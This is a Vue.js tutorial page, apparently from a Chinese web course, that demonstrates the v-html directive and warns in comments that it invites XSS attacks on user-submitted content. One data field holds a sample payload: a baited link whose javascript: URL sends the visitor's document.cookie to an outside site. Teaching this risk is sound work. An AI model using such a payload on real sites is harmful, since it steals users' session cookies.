<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <!-- 引入Vue -->
    <script type="text/javascript" src="../js/vue.js"></script>

</head>
<body>
    <!-- 准备好一个容器 -->
    <div id="root">
        <div>{{name}}</div>
        <div v-html="str"></div>
        <div v-html="str2"></div>
    </div>

</body>

    <!-- 
        v-html指令：
            1、作用：向指定结构中渲染包含html结构的内容
            2、与插值语法的区别：
                1、v-html会替换掉节点中的所有内容，{{xxx}}则不会
                2、v-html可以识别html结构
            3、严重注意：v-html有安全性问题！！！！
                1、再网站上动态渲染html是非常危险的，容易导致XSS攻击
                2、一定要在可信的内容上使用v-html，永远不要使用再用户提交的内容上

     -->

    <script type="text/javascript">
        new Vue({
            el:'#root',
            data:{
                name:'尚硅谷',
                str:'<h3>你好啊</h3>',
                str2:'<a href=javascript:location.href="https://www.baidu.com?"+document.cookie>兄弟，我找到你想要的资源了，快来！</a>'    
            }
        })       

    </script>

</html>